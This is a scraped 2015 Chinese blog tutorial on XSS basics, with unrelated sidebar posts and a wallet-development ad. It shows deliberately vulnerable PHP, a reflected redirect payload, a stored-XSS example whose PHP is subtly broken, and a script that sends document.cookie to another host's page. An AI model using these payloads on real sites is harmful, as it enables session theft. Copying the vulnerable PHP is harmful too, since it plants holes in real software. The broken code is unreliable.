文档章节

XSS攻击基础

熊猫88
 熊猫88
发布于 2015/12/21 23:42
字数 490
阅读 166
收藏 12

XSS攻击是一个非常常见的攻击。
  1.最简单版本:
  <?php
     $name = $_GET['name'];
     echo  " hello  <br >$name";
   ?>
   本意是获取到了test后,告诉用户test提交成功
   www.test.com以为是个安全连接一般用户会被认为是
   www.test.com?name=boy 这种:
 实际上攻击者写的
 www.shopxiong.com/xss.php?name=<script>window.onload=function(){
  window.location.href="http://www.baidu.com";
 }</script>
经过url编码后
www.test.com/xss.php?name=%3Cscript%3Ewindow.onload=function()%7B%0A%20%20window.location.href=%22http://www.baidu.com%22;%0A%20%7D%3C/script%3E%0A
用户可能还误以为在www.test.com站点,其实此时会自动跳转到baidu.com网站里面。如果此时A和B非常相似,没有注意此时已经不是A站了(最常见的是钓鱼站点),会泄漏自己的账号信息
2.对A站点发送了一个恶意攻击的语句
   恶意语句依然和上面一样:%3Cscript%3Ewindow.onload=function()%7B%0A%20%20window.location.href=%22http://www.baidu.com%22;%0A%20%7D%3C/script%3E%0A
  test1.php
 <?php
    $text =  file_put_contents($_GET['text'],1.txt);
  ?>
  另外一个页面对这些进行读取  test2.php
  <?php  echo   file_get_contents("1.txt");  ?>
  当你访问test.php  无奈的发现,每当访问那个网站,都会自动跳转到baidu.com页面
  场景:恶意攻击者给某个用户进行留言(但是留言没有经过严格过滤,直接进行了暂时性的保存)然后另外一个用户点击查看恶意攻击者给其的留言的时候,触发该脚本(跳转到另外一个页面或者弹窗)
3.窃取当前用户的session或者网站cookie,对用户进行虚拟模仿
     document.cookie(可以获取到用户的session和相关登录后信息)
   仍然和上面相似。恶意攻击者通过某种手段把数据提交后
   在另一个页面进行调用
   www.shopxiong.com/xss.php?name=<script>window.onload=function(){
  window.location.href="http://www.shopxiong.com/test3.php?c="+document.cookie
 }</script>
  窃取当前访问者的cookie 然后通过另一个访问链接进行保存

© 著作权归作者所有

熊猫88
粉丝 18
博文 76
码字总数 65366
作品 0
程序员
私信 提问
Xss 跨站脚本测试平台--XssAPP

XssAPP 是一个专业的 XSS 渗透测试平台。 平台简介 用户在浏览网站、使用即时通讯软件、甚至在阅读电子邮件时,通常会点击其中的链接。攻击者通过在链接中插入恶意代码,就能够盗取用户信息。...

Coody
2017/02/07
1K
3
Web安全系列(一):XSS 攻击基础及原理

跨站脚本攻击(XSS)是客户端脚本安全的头号大敌。本文章深入探讨 XSS 攻击原理,下一章(XSS 攻击进阶)将深入讨论 XSS 进阶攻击方式。 本系列将持续更新。 XSS 简介 XSS(Cross Site Scri...

梁音
2018/09/12
0
0
每一个工程师都要学的安全测试,老板再也不用担心服务器被黑

本文由云+社区发表 本篇包含了XSS漏洞攻击及防御详细介绍,包括漏洞基础、XSS基础、编码基础、XSS Payload、XSS攻击防御。 第一部分:漏洞攻防基础知识 XSS属于漏洞攻防,我们要研究它就要了...

腾讯云加社区
2018/12/18
47
0
前端基础重点回顾5:XSS、CSRF攻击

XSS 攻击前提 攻击脚本必须添加到页面上 攻击方式 跨站脚本XSS(Cross site script) 代码注入 script 标签注入攻击 标签属性注入攻击 广告注入 防止XSS攻击 获取的数据不允许进行字符串拼接 ...

jirengu_杨然
2018/01/31
0
0
Web安全系列(三):XSS 攻击进阶(挖掘漏洞)

前言 在前些章节 (web安全系列(一):XSS 攻击基础及原理)以及(Web安全系列(二):XSS 攻击进阶(初探 XSS Payload))中,我详细介绍了 XSS 形成的原理以及 XSS 攻击的分类,并且编写了...

梁音
2018/09/18
0
0

没有更多内容

加载失败,请刷新页面

加载更多

ThreaLocal实现原理

ThreadLocal的实现很简单 Thread内部维护一个ThreadLocalMap对象,key就是Thread对象。 set的时候会将value放入当前线程的ThreadLocalMap对象里面。 get的时候会通过当前线程ThreadLocalMap对...

Lubby
14分钟前
4
0
字符流中第一个不重复的字符

请实现一个函数用来找出字符流中第一个只出现一次的字符。例如,当从字符流中只读出前两个字符 "go" 时,第一个只出现一次的字符是 "g"。当从该字符流中读出前六个字符“google" 时,第一个只...

Garphy
19分钟前
4
0
如何实现Java后端数据校验?看这篇就足够!

前言 每次我们在搭建一个开源项目的首要任务包括:项目的统一异常处理、统一结果封装以及做项目的数据校验,在前后端分离的情况下,不仅前端需要做数据校验,同样后端也要实现,前端主要使用...

code-ortaerc
23分钟前
3
0
thinkphp5.1学习过程六——连接数据库

<?phpnamespace app\index\controller;use think\Db;/** * Class Demo4 * @package app\index\controller * 连接数据库 * 1.全局配置:config/databass.php * 2.动态配...

大海yht
24分钟前
5
0
波点钱包系统开发细节

  波点钱包系统开发细节找杨生Te/V:I37-5OI6电33-I7、波点钱包系统组合开发、波点钱包系统开发时间、波点钱包软件开发、波点钱包软件组合开发   波点钱包是基于区块链技术开发的一款钱包...

ykd123
24分钟前
5
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部